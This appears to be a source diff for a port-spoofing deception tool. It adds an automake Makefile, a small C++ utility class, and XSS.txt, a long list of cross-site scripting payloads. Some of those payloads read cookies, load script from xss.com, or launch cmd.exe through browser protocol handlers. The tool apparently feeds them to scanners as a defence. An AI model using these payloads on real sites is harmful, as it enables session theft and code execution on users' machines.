+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.o -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='portspoof.c' object='portspoof-portspoof.o' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c
+
+portspoof-portspoof.obj: portspoof.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.obj -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi`
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='portspoof.c' object='portspoof-portspoof.obj' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi`
+
+portspoof-revregex.o: revregex.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.o -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='revregex.c' object='portspoof-revregex.o' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c
+
+portspoof-revregex.obj: revregex.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.obj -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi`
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='revregex.c' object='portspoof-revregex.obj' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi`
+
+portspoof-log.o: log.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.o -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='log.c' object='portspoof-log.o' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c
+
+portspoof-log.obj: log.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.obj -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi`
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='log.c' object='portspoof-log.obj' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi`
+
+portspoof-config_file.o: config_file.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.o -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='config_file.c' object='portspoof-config_file.o' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c
+
+portspoof-config_file.obj: config_file.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.obj -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi`
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='config_file.c' object='portspoof-config_file.obj' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi`
+
+ID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES)
+	list='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \
+	unique=`for i in $$list; do \
+	    if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
+	  done | \
+	  $(AWK) '    { files[$$0] = 1; } \
+	       END { for (i in files) print i; }'`; \
+	mkid -fID $$unique
+tags: TAGS
+
+TAGS:  $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \
+		$(TAGS_FILES) $(LISP)
+	tags=; \
+	here=`pwd`; \
+	list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \
+	unique=`for i in $$list; do \
+	    if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
+	  done | \
+	  $(AWK) '    { files[$$0] = 1; } \
+	       END { for (i in files) print i; }'`; \
+	if test -z "$(ETAGS_ARGS)$$tags$$unique"; then :; else \
+	  test -n "$$unique" || unique=$$empty_fix; \
+	  $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \
+	    $$tags $$unique; \
+	fi
+ctags: CTAGS
+CTAGS:  $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \
+		$(TAGS_FILES) $(LISP)
+	tags=; \
+	here=`pwd`; \
+	list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \
+	unique=`for i in $$list; do \
+	    if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
+	  done | \
+	  $(AWK) '    { files[$$0] = 1; } \
+	       END { for (i in files) print i; }'`; \
+	test -z "$(CTAGS_ARGS)$$tags$$unique" \
+	  || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \
+	     $$tags $$unique
+
+GTAGS:
+	here=`$(am__cd) $(top_builddir) && pwd` \
+	  && cd $(top_srcdir) \
+	  && gtags -i $(GTAGS_ARGS) $$here
+
+distclean-tags:
+	-rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags
+
+distdir: $(DISTFILES)
+	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
+	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
+	list='$(DISTFILES)'; \
+	  dist_files=`for file in $$list; do echo $$file; done | \
+	  sed -e "s|^$$srcdirstrip/||;t" \
+	      -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \
+	case $$dist_files in \
+	  */*) $(MKDIR_P) `echo "$$dist_files" | \
+			   sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \
+			   sort -u` ;; \
+	esac; \
+	for file in $$dist_files; do \
+	  if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \
+	  if test -d $$d/$$file; then \
+	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
+	    if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
+	      cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \
+	    fi; \
+	    cp -pR $$d/$$file $(distdir)$$dir || exit 1; \
+	  else \
+	    test -f $(distdir)/$$file \
+	    || cp -p $$d/$$file $(distdir)/$$file \
+	    || exit 1; \
+	  fi; \
+	done
+check-am: all-am
+check: check-am
+all-am: Makefile $(PROGRAMS) config.h
+installdirs:
+	for dir in "$(DESTDIR)$(bindir)"; do \
+	  test -z "$$dir" || $(MKDIR_P) "$$dir"; \
+	done
+install: install-am
+install-exec: install-exec-am
+install-data: install-data-am
+uninstall: uninstall-am
+
+install-am: all-am
+	@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
+
+installcheck: installcheck-am
+install-strip:
+	$(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \
+	  install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \
+	  `test -z '$(STRIP)' || \
+	    echo "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'"` install
+mostlyclean-generic:
+
+clean-generic:
+
+distclean-generic:
+	-test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES)
+
+maintainer-clean-generic:
+	@echo "This command is intended for maintainers to use"
+	@echo "it deletes files that may require special tools to rebuild."
+clean: clean-am
+
+clean-am: clean-binPROGRAMS clean-generic mostlyclean-am
+
+distclean: distclean-am
+	-rm -rf ./$(DEPDIR)
+	-rm -f Makefile
+distclean-am: clean-am distclean-compile distclean-generic \
+	distclean-hdr distclean-tags
+
+dvi: dvi-am
+
+dvi-am:
+
+html: html-am
+
+info: info-am
+
+info-am:
+
+install-data-am:
+
+install-dvi: install-dvi-am
+
+install-exec-am: install-binPROGRAMS
+
+install-html: install-html-am
+
+install-info: install-info-am
+
+install-man:
+
+install-pdf: install-pdf-am
+
+install-ps: install-ps-am
+
+installcheck-am:
+
+maintainer-clean: maintainer-clean-am
+	-rm -rf ./$(DEPDIR)
+	-rm -f Makefile
+maintainer-clean-am: distclean-am maintainer-clean-generic
+
+mostlyclean: mostlyclean-am
+
+mostlyclean-am: mostlyclean-compile mostlyclean-generic
+
+pdf: pdf-am
+
+pdf-am:
+
+ps: ps-am
+
+ps-am:
+
+uninstall-am: uninstall-binPROGRAMS
+
+.MAKE: install-am install-strip
+
+.PHONY: CTAGS GTAGS all all-am check check-am clean clean-binPROGRAMS \
+	clean-generic ctags distclean distclean-compile \
+	distclean-generic distclean-hdr distclean-tags distdir dvi \
+	dvi-am html html-am info info-am install install-am \
+	install-binPROGRAMS install-data install-data-am install-dvi \
+	install-dvi-am install-exec install-exec-am install-html \
+	install-html-am install-info install-info-am install-man \
+	install-pdf install-pdf-am install-ps install-ps-am \
+	install-strip installcheck installcheck-am installdirs \
+	maintainer-clean maintainer-clean-generic mostlyclean \
+	mostlyclean-compile mostlyclean-generic pdf pdf-am ps ps-am \
+	tags uninstall uninstall-am uninstall-binPROGRAMS
+
+# Tell versions [3.59,3.63) of GNU make to not export all variables.
+# Otherwise a system limit (for SysV at least) may be exceeded.
+.NOEXPORT:

src/src/Utils.cpp

@@ -0,0 +1,154 @@
+#include "Utils.h"
+void Utils::hexdump(void *mem, unsigned int len)
+{
+    unsigned int i, j;
+    
+    for(i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++)
+    {
+        /* print offset */
+        if(i % HEXDUMP_COLS == 0)
+        {
+            fprintf(stdout,"0x%06x: ", i);
+        }
+        
+        /* print hex data */
+        if(i < len)
+        {
+            fprintf(stdout,"%02x ", 0xFF & ((char*)mem)[i]);
+        }
+        else /* end of block, just aligning for ASCII dump */
+        {
+            fprintf(stdout,"   ");
+        }
+        
+        /* print ASCII dump */
+        if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1))
+        {
+            for(j = i - (HEXDUMP_COLS - 1); j <= i; j++)
+            {
+                if(j >= len) /* end of block, not really printing */
+                {
+                    putchar(' ');
+                }
+                else if(isprint(((char*)mem)[j])) /* printable char */
+                {
+                    putchar(0xFF & ((char*)mem)[j]);
+                }
+                else /* other char */
+                {
+                    putchar('.');
+                }
+            }
+            putchar('\n');
+        }
+    }
+}
+
+std::vector<char> Utils::wrapNMAP(string wrapper,std::vector<char> payload)
+{
+	stringstream ss;	
+	string str;
+	std::vector<char> result_vector;
+	
+	ss<<wrapper.substr(0,wrapper.find("__FUZZ__"));
+	str=ss.str();
+	
+	for(int i=0; i<str.length();i++)
+		result_vector.push_back(str[i]);	
+	
+	result_vector.insert(result_vector.end(),payload.begin(),payload.end());
+	
+	ss.str("");
+	ss<<wrapper.substr(wrapper.find("__FUZZ__")+strlen("__FUZZ__"),wrapper.size());
+	
+	str=ss.str();
+	
+	for(int i=0; i<str.length();i++)
+		result_vector.push_back(str[i]);		
+	
+	return result_vector;
+}
+
+std::vector<char> Utils::str2vector( std::string& s)
+{
+	std::vector<char> result_vector;
+	
+	for(int i=0; i<s.length();i++)
+		result_vector.push_back(s[i]);
+		
+	return result_vector;
+	
+	
+}
+int Utils::isNumeric (const char * s)
+{
+    if (s == NULL || *s == '\0' || isspace(*s))
+     return 0;
+    char * p;
+    strtod(s, &p);
+    return *p == '\0';
+}
+
+
+std::vector<char> Utils::unescape(std::vector<char> & s)
+{
+  std::vector<char> res;
+  vector<char>::const_iterator it = s.begin();
+  while (it != s.end())
+  {
+    char c = *it++;
+    if (c == '\\' && it != s.end())
+    {
+      switch (*it++) {
+      case 'n': c = '\n'; break;
+      case 'r': c = '\r'; break;
+      case 't': c = '\t'; break;
+
+      // all other escapes
+      default: 
+        // invalid escape sequence - skip it. alternatively you can copy it as is, throw an exception...
+        continue;
+      }
+    }
+    res.push_back(c);
+  }
+
+  return res;
+}
+
+
+char * Utils::get_substring_value(char* str)
+{
+	int i=0;
+	int soffset=-1,eoffset=-1;
+	for(i;i<strlen(str);i++)
+	{
+		if(str[i]=='"')
+		{
+		
+		if(soffset==-1)
+			soffset=i;
+		else if(eoffset==-1)
+			{
+				eoffset=i;
+				break;
+			}
+		else
+			{
+			fprintf(stdout,"Error in configuration file1");
+			exit(1);
+			}
+		}
+	}
+	
+	if(soffset==-1 || eoffset==-1)
+	{
+			fprintf(stdout,"Error in configuration file2");
+			exit(1);
+	}
+				
+	char *substr=(char*)malloc(eoffset-soffset);
+	memset(substr,0,eoffset-soffset);
+	memcpy(substr,str+soffset+1,eoffset-soffset-1);
+	return substr;	
+}

src/src/Utils.h

@@ -0,0 +1,40 @@
+#ifndef UTILS_H
+#define UTILS_H
+
+
+#include <stdio.h>
+#include <ctype.h>
+#include <stdlib.h>
+#include <openssl/aes.h>
+#include <openssl/evp.h>
+#include <string.h>
+#include <string>
+#include <sstream>
+#include <iostream>
+#include <vector>
+
+
+#ifndef HEXDUMP_COLS
+#define HEXDUMP_COLS 16
+#endif
+
+
+using namespace std;
+
+class Utils {
+	
+	public:
+
+		static void hexdump(void *mem, unsigned int len);
+		static int isNumeric (const char * s);
+		static char* get_substring_value(char* str);
+		static std::vector<char> wrapNMAP(string wrapper,std::vector<char> payload);
+		static std::vector<char> unescape( std::vector<char>& s);
+		static std::vector<char> str2vector( std::string& s);
+		
+		
+};
+
+
+#endif
+

src/src/XSS.txt

@@ -0,0 +1,188 @@
+aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
+firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
+navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
+res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
+<<scr\0ipt/src=http://xss.com/xss.js></script
+%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
+' onmouseover=alert(/Black.Spook/)
+"><iframe%20src="http://google.com"%%203E
+'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
+x”</title><img src%3dx onerror%3dalert(1)>
+<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
+<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
+<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
+<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
+<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
+<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
+<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
+<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
+<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
+<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    alert(c[1]); }catch(e){} };  xdr.send(); </script>
+<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); alert(Safe.get());</script>
+<script>alert(document.head.innerHTML.substr(146,20));</script>
+<script>alert(document.head.childNodes[3].text)</script>
+<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
+<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
+<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
+<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
+<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
+<script>  (function (o) {   function exploit(x) {    if (x !== null)     alert('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>
+<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
+<script>     function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> 
+<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
+<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # 
+<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
+<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
+<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
+<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
+<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
+<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
+<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
